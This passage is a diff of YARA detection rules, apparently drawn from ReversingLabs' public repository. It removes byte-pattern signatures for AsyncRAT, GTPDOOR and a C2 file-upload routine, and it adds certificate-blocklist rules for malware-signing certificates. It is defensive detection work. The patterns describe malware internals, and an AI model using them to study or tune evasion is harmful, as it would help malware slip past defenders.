-            1F 10 1F 3A 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 11 1F 73 13 ?? 12 ?? 28 ?? ?? ?? ??
-            A2 25 1F 12 1F 73 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 13 1F 20 13 ?? 12 ?? 28 ?? ??
-            ?? ?? A2 25 1F 14 1F 74 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 15 1F 74 13 ?? 12 ?? 28
-            ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 25 18 72 ?? ?? ?? ?? A2 25 19 1F 46
-            13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F 49 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1B 1F 4C
-            13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1C 1F 45 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1D 72 ??
-            ?? ?? ?? A2 25 1E 11 ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 09 72 ??
-            ?? ?? ?? A2 25 1F 0A 11 ?? 6F ?? ?? ?? ?? A2 25 1F 0B 72 ?? ?? ?? ?? A2 28 ?? ?? ??
-            ?? 13 ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 3F ?? ?? ?? ?? 1F 0B 8D ?? ?? ?? ?? 25
-            16 11 ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 11 ?? 8E 69 13 ?? 12 ?? 28 ?? ?? ?? ?? A2
-            25 19 1F 20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F 44 13 ?? 12 ?? 28 ?? ?? ?? ?? A2
-            25 1B 1F 69 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1C 1F 72 13 ?? 12 ?? 28 ?? ?? ?? ?? A2
-            25 1D 1F 28 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1E 1F 73 13 ?? 12 ?? 28 ?? ?? ?? ?? A2
-            25 1F 09 1F 29 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0A 72 ?? ?? ?? ?? A2 28 ?? ?? ??
-            ?? 13 ?? 1F 0B 8D ?? ?? ?? ?? 25 16 11 ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 11 ?? 8E
-            69 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 19 1F 20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F
-        }
-		$upload_file_to_c2_p1 = {
-            11 ?? 28 ?? ?? ?? ?? 13 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 8E 69 17 3E ?? ?? ?? ?? 11 ??
-            17 9A 17 8D ?? ?? ?? ?? 25 16 1F 22 9D 6F ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 39
-            ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 02 28 ?? ?? ?? ??
-            13 ?? 1F 0D 8D ?? ?? ?? ?? 25 16 1F 75 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 17 1F 40 13
-            ?? 12 ?? 28 ?? ?? ?? ?? A2 25 18 11 ?? A2 25 19 1F 40 13 ?? 12 ?? 28 ?? ?? ?? ?? A2
-            25 1A 28 ?? ?? ?? ?? A2 25 1B 1F 7C 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1C 28 ?? ?? ??
-            ?? A2 25 1D 1F 40 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1E 11 ?? A2 25 1F 09 1F 40 13 ??
-            12 ?? 28 ?? ?? ?? ?? A2 25 1F 0A 1F 32 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0B 1F 40
-            13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0C 11 ?? 28 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 13 ??
-            02 02 7B ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 26 1F 1E 8D ?? ?? ?? ?? 25 16 1F 66 13 ??
-            12 ?? 28 ?? ?? ?? ?? A2 25 17 1F 69 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 18 1F 6C 13 ??
-            12 ?? 28 ?? ?? ?? ?? A2 25 19 1F 65 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F 5B 13 ??
-            12 ?? 28 ?? ?? ?? ?? A2 25 1B 11 ?? A2 25 1C 1F 5D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25
-            1D 1F 20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1E 1F 69 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25
-            1F 09 1F 73 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0A 1F 20 13 ?? 12 ?? 28
-        }
-		$upload_file_to_c2_p2 = {
-            A2 25 1F 0B 1F 75 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0C 1F 70 13 ?? 12 ?? 28 ?? ??
-            ?? ?? A2 25 1F 0D 1F 6C 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0E 1F 6F 13 ?? 12 ?? 28
-            ?? ?? ?? ?? A2 25 1F 0F 1F 61 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 10 1F 64 13 ?? 12
-            ?? 28 ?? ?? ?? ?? A2 25 1F 11 1F 65 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 12 1F 64 13
-            ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 13 1F 20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 14 1F
-            74 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 15 1F 6F 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F
-            16 1F 20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 17 1F 73 13 ?? 12 ?? 28 ?? ?? ?? ?? A2
-            25 1F 18 1F 65 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 19 1F 72 13 ?? 12 ?? 28 ?? ?? ??
-            ?? A2 25 1F 1A 1F 76 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 1B 1F 65 13 ?? 12 ?? 28 ??
-            ?? ?? ?? A2 25 1F 1C 1F 72 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 1D 1F 2E 13 ?? 12 ??
-            28 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 1F 0F 8D ?? ?? ?? ?? 25 16 1F
-            66 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 17 1F 69 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 18 1F
-            6C 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 19 1F 65 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F
-            20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1B 1F 6E 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1C 1F
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $send_fingerprint_to_c2_p* ) ) and ( all of ( $get_files_and_directories_p* ) ) and ( all of ( $upload_file_to_c2_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OWLNET LIMITED" and ( pe.signatures [ i ] . serial == "00:ed:a2:42:90:83:bf:af:b0:4e:6e:7b:dd:a1:b0:88:34" or pe.signatures [ i ] . serial == "ed:a2:42:90:83:bf:af:b0:4e:6e:7b:dd:a1:b0:88:34" ) and 1625011200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Backdoor_Asyncrat : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_0A590154B5980E566314122987Dea548 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects AsyncRAT backdoor."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "78ff36e1-1620-50f4-8abd-adcf8b1242da"
-		date = "2024-05-22"
-		modified = "2024-05-22"
+		id = "fd2a2165-494b-5655-a322-73f033643c74"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/backdoor/ByteCode.MSIL.Backdoor.AsyncRAT.yara#L1-L149"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "53a13975cd53b571910f951adc44707c11b86c003eeb7b88dbe701253645ac89"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10372-L10388"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "d5fdf2bc61fadf3e73bcf1695c48ebc465e614cdd2310f9e5f40648d9615afc4"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "AsyncRAT"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$read_server_data_v1 = {
-            28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 39 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 16 28 ??
-            ?? ?? ?? DD ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 6F ?? ?? ?? ?? 0A 06 16 3E ?? ?? ?? ?? 28
-            ?? ?? ?? ?? 06 6A 58 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 06 6A 59 28 ?? ?? ?? ?? 28 ?? ??
-            ?? ?? 3A ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 6A 28 ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 16 6A 3E ?? ?? ?? ?? 16 6A 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? D4 8D ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 38 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 69 28 ?? ?? ??
-            ?? 69 6F ?? ?? ?? ?? 0B 07 16 3D ?? ?? ?? ?? 16 28 ?? ?? ?? ?? DD ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 07 6A 58 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 07 6A 59 28 ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 16 6A 3C ?? ?? ?? ?? 16 28 ?? ?? ?? ?? DD ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 6A 30 ??
-            14 (FE | 06) ?? ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ??
-            ?? 16 6A 28 ?? ?? ?? ?? 1A 6A 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? D4 8D ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 38 ?? ?? ?? ?? 1A 6A 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? D4 8D ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 16 6A 28 ?? ?? ?? ?? 38 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 6A 3C ?? ?? ?? ?? 16
-            28 ?? ?? ?? ?? DD ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 69 28 ??
-            ?? ?? ?? 69 14 (FE | 06) ?? ?? ?? ?? ?? 73 ?? ?? ?? ?? 14 6F ?? ?? ?? ?? 26 38 ?? ??
-            ?? ?? 16 28 ?? ?? ?? ?? DD ?? ?? ?? ?? 26 16 28 ?? ?? ?? ?? DD
-        }
-		$send_v1 = {
-            28 ?? ?? ?? ?? 0A 16 0B 06 12 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? DD ??
-            ?? ?? ?? 02 8E 69 28 ?? ?? ?? ?? 0C 28 ?? ?? ?? ?? 15 17 6F ?? ?? ?? ?? 26 28 ?? ??
-            ?? ?? 08 16 08 8E 69 6F ?? ?? ?? ?? 02 8E 69 20 ?? ?? ?? ?? 3E ?? ?? ?? ?? 02 73 ??
-            ?? ?? ?? 0D 16 13 ?? 09 16 6A 6F ?? ?? ?? ?? 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 13 ?? 38
-            ?? ?? ?? ?? 28 ?? ?? ?? ?? 15 17 6F ?? ?? ?? ?? 26 28 ?? ?? ?? ?? 11 ?? 16 11 ?? 6F
-            ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 25
-            13 ?? 16 30 ?? DD ?? ?? ?? ?? 09 39 ?? ?? ?? ?? 09 6F ?? ?? ?? ?? DC 28 ?? ?? ?? ??
-            15 17 6F ?? ?? ?? ?? 26 28 ?? ?? ?? ?? 02 16 02 8E 69 6F ?? ?? ?? ?? 28 ?? ?? ?? ??
-            6F ?? ?? ?? ?? DD ?? ?? ?? ?? 26 16 28 ?? ?? ?? ?? DD ?? ?? ?? ?? 07 39 ?? ?? ?? ??
-            06 28 ?? ?? ?? ?? DC
-        }
-		$read_packet_v1_p1 = {
-            73 ?? ?? ?? ?? 0A 06 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 02 74 ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B
-            07 28 ?? ?? ?? ?? 0C 08 20 4F 01 89 64 42 ?? ?? ?? ?? 08 20 7A 39 BA 13 42 ?? ?? ??
-            ?? 08 20 D4 CA CD 0C 3B ?? ?? ?? ?? 08 20 7A 39 BA 13 3B ?? ?? ?? ?? 38 ?? ?? ?? ??
-            08 20 2B C2 32 1B 3B ?? ?? ?? ?? 08 20 E2 A2 F4 57 3B ?? ?? ?? ?? 08 20 4F 01 89 64
-            3B ?? ?? ?? ?? 38 ?? ?? ?? ?? 08 20 5A 15 79 D9 42 ?? ?? ?? ?? 08 20 B7 16 DB 7A 3B
-            ?? ?? ?? ?? 08 20 39 20 3F B2 3B ?? ?? ?? ?? 08 20 5A 15 79 D9 3B ?? ?? ?? ?? 38 ??
-            ?? ?? ?? 08 20 1E CA D2 DC 3B ?? ?? ?? ?? 08 20 45 FD B6 E0 3B ?? ?? ?? ?? 08 20 D0
-            5E 9B FA 3B ?? ?? ?? ?? 38 ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ??
-            ?? 38 ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 38 ?? ?? ?? ?? 07
-            72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 38 ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 3A ?? ?? ?? ?? 38 ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ??
-            ?? 38 ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 38 ?? ?? ?? ?? 07
-            72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 38 ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 3A ?? ?? ?? ?? 38 ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ??
-            ?? 38 ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 38 ?? ?? ?? ?? 07
-        }
-		$read_packet_v1_p2 = {
-            72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 38 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 73 ??
-            ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 72 ?? ??
-            ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6A 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ??
-            16 28 ?? ?? ?? ?? 38 ?? ?? ?? ?? 00 06 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ??
-            6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 7E ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 6F ??
-            ?? ?? ?? 73 ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ??
-            ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ??
-            6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 38 ?? ?? ?? ?? 06 7B ??
-            ?? ?? ?? 28 ?? ?? ?? ?? DD ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? DD ?? ?? ?? ??
-            06 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 72
-            ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 7E ?? ?? ?? ?? 28 ?? ??
-            ?? ?? 6F ?? ?? ?? ?? 0D 38 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 11 ??
-            6F ?? ?? ?? ?? 26 12 ?? 28 ?? ?? ?? ?? 2D ?? DD ?? ?? ?? ?? 12 ?? (FE | 16) ?? ?? ??
-            ?? ?? 6F ?? ?? ?? ?? DC 73 ?? ?? ?? ?? 26 06 (FE | 06) ?? ?? ?? ?? ?? 73 ?? ?? ?? ??
-            73 ?? ?? ?? ?? 25 16 6F ?? ?? ?? ?? 25 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 38 ?? ?? ?? ??
-            7E ?? ?? ?? ?? 25 3A ?? ?? ?? ?? 26 7E ?? ?? ?? ?? (FE | 06) ?? ?? ?? ?? ?? 73
-        }
-		$send_v2 = {
-            7E ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 16 13 ?? 11 ?? 12 ?? 28 ?? ?? ?? ?? 7E ??
-            ?? ?? ?? 39 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0A 02 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 8E
-            B7 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 06 08 16 08 8E B7
-            6F ?? ?? ?? ?? 06 07 16 07 8E B7 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 15 17 6F ?? ?? ?? ??
-            26 7E ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 16 06 6F ?? ?? ?? ?? B7 16 14 (FE | 06) ?? ?? ??
-            ?? ?? 73 ?? ?? ?? ?? 14 6F ?? ?? ?? ?? 26 DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? DC DE ??
-            25 28 ?? ?? ?? ?? 0D 16 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? DE ?? 11 ?? 2C ?? 11 ??
-            28 ?? ?? ?? ?? DC
-        }
-		$open_url_v2 = {
-            03 39 ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 20 00 0C 00 00 28 ?? ?? ?? ?? 20 0F 27 00 00 28
-            ?? ?? ?? ?? DE ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 02 28 ?? ?? ?? ?? 74 ?? ?? ??
-            ?? 0A 06 7E ?? ?? ?? ?? 73 ?? ?? ?? ?? 7E ?? ?? ?? ?? 8E B7 6F ?? ?? ?? ?? 9A 6F ??
-            ?? ?? ?? 06 17 6F ?? ?? ?? ?? 06 20 10 27 00 00 6F ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 74 ?? ?? ?? ?? 0B DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? DC
-            2B ?? 02 28 ?? ?? ?? ?? 26
-        }
-		$monitoring_v2 = {
-            73 ?? ?? ?? ?? 0C 02 72 ?? ?? ?? ?? 15 16 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ??
-            11 ?? 9A 0B 08 07 14 72 ?? ?? ?? ?? 16 8D ?? ?? ?? ?? 14 14 14 28 ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 6F ?? ?? ?? ?? 11 ?? 17 D6 13 ?? 11 ?? 11 ?? 8E B7 32 ?? 1F ?? 0A 38 ?? ??
-            ?? ?? 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 0D 09 6F ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 2C ?? 2B ?? 08 09 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 (FE | 07) ?? ?? ?? ?? ??
-            73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 06 1F ?? 31 ?? 16 0A 72 ?? ?? ?? ?? 09 6F ?? ??
-            ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 17 D6 13 ??
-            11 ?? 11 ?? 8E B7 32 ?? 06 17 D6 0A 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 3A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( ( $read_server_data_v1 ) and ( $send_v1 ) and ( all of ( $read_packet_v1_p* ) ) ) or ( ( $send_v2 ) and ( $open_url_v2 ) and ( $monitoring_v2 ) ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Maya logistika d.o.o." and pe.signatures [ i ] . serial == "0a:59:01:54:b5:98:0e:56:63:14:12:29:87:de:a5:48" and 1636416000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Linux_Backdoor_GTPDOOR : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_69A72F5591Ad78A0825Fbb9402Ab9543 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects GTPDOOR backdoor."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9e6df856-fe54-504c-8530-321adc91cd5a"
-		date = "2024-09-10"
-		modified = "2024-09-10"
+		id = "938cdd31-433d-5df7-b00e-54a7e440810b"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/backdoor/Linux.Backdoor.GTPDOOR.yara#L1-L264"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "b7b4b33b7838142e34c6d02260b6585305c4730c90e12b1adc099f9aeecf071a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10390-L10406"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "72ca07b7722f9506c5c42b5e58c5ce9b3a7d607164a5f265015769f2831cd588"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "GTPDOOR"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$send_result_to_peer_v1_p1 = {
-            55 89 E5 57 56 53 81 EC ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 66 89 85 ?? ?? ?? ?? 66 89 95
-            ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89
-            14 24 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 81 BD ?? ?? ?? ?? ?? ?? 77 ?? 0F B7 8D
-            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 55 ?? 89 C7 89 D6 FC F3 A4 EB ?? 8D 85 ?? ?? ?? ??
-            8B 55 ?? 89 C1 B8 ?? ?? ?? ?? 89 44 24 ?? 89 54 24 ?? 89 0C 24 E8 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 40 ?? 89 45 ?? 8B 45 ?? 8B 50 ?? 8B 45 ?? 89 50 ??
-            8B 55 ?? 8B 45 ?? 89 42 ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 45 ?? 89 C2 8D 85 ?? ?? ??
-            ?? 01 D0 89 45 ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 45 ?? 0F B7 40 ?? 66 89 45 ?? 8B 45
-            ?? 0F B7 10 8B 45 ?? 66 89 50 ?? 8B 55 ?? 0F B7 45 ?? 66 89 02 8B 45 ?? 89 C2 8D 85
-            ?? ?? ?? ?? 01 D0 89 45 ?? 8B 45 ?? C6 40 ?? ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 45 ??
-            89 C2 8D 85 ?? ?? ?? ?? 01 D0 89 45 ?? 8B 45 ?? 66 C7 40 ?? ?? ?? 66 81 BD ?? ?? ??
-            ?? ?? ?? 76 ?? 8B 45 ?? 83 C0 ?? BA ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ??
-            8B 45 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 14 24 E8 ?? ?? ?? ?? C7 04 24 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 66 89 50 ?? 8B 45 ?? 66 C7 40 ?? ?? ?? EB ?? 8B
-            45 ?? 83 C0 ?? 0F B7 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? 89 44 24 ?? 89 54 24 ?? 8B 45 ??
-            89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 0C 24 E8 ?? ?? ?? ?? 0F B7 85 ?? ?? ?? ?? 83
-        }
-		$send_result_to_peer_v1_p2 = {
-            C0 ?? 0F B7 C0 89 04 24 E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 66 89 50 ?? 8B 55 ?? 0F B7 85
-            ?? ?? ?? ?? 66 89 42 ?? 8B 45 ?? 0F B7 40 ?? 83 C0 ?? 0F B7 C0 89 04 24 E8 ?? ?? ??
-            ?? 89 C2 8B 45 ?? 66 89 50 ?? 8B 45 ?? 0F B7 50 ?? 8B 45 ?? 0F B7 40 ?? 8D 04 02 8D
-            50 ?? 8B 45 ?? 66 89 50 ?? 8B 45 ?? 0F B7 40 ?? 0F B7 C0 89 04 24 E8 ?? ?? ?? ?? 89
-            C2 8B 45 ?? 66 89 50 ?? 8B 45 ?? 0F B7 40 ?? 0F B7 C0 89 04 24 E8 ?? ?? ?? ?? 66 89
-            45 ?? 8B 45 ?? 66 C7 40 ?? ?? ?? 0F B7 4D ?? 8B 5D ?? 8B 45 ?? 8B 50 ?? 8B 45 ?? 8B
-            40 ?? 89 4C 24 ?? 89 5C 24 ?? 89 54 24 ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 89 C2 8B 45 ?? 66 89 50 ?? 8B 55 ?? 0F B6 42 ?? 83 C8 ?? 88 42 ?? 0F B7 45 ??
-            83 C0 ?? 0F B7 C0 89 04 24 E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 66 89 50 ?? 8B 45 ?? 66 C7
-            40 ?? ?? ?? 0F B7 45 ?? 83 C0 ?? 8D 95 ?? ?? ?? ?? 89 44 24 ?? 89 14 24 E8 ?? ?? ??
-            ?? 89 C2 8B 45 ?? 66 89 50 ?? 8B 45 ?? 8B 40 ?? 89 85 ?? ?? ?? ?? 66 C7 85 ?? ?? ??
